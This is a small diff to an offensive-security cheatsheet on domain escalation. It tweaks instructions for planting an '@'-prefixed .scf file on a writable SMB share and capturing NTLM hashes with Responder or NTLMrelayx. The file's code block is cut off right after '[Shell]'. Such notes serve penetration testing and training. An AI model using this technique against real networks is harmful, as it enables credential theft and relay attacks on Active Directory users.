michmich1000/Cheatsheets/Cheatsheets/internal/08-domain-escalation.md

 **SMB writable shares**

-upload this @scf_filename.scf and listen for the hash with Responder/NTLMrelayx
+upload this @scf_filename.scf and listen for hashs using Responder/NTLMrelayx

-> Note: add a @ at first letter of the filename will place the .scf file on the top of the shared folder
+> add a @ at first letter of the filename will place the .scf file on the top of the shared folder

 ```bash
 [Shell]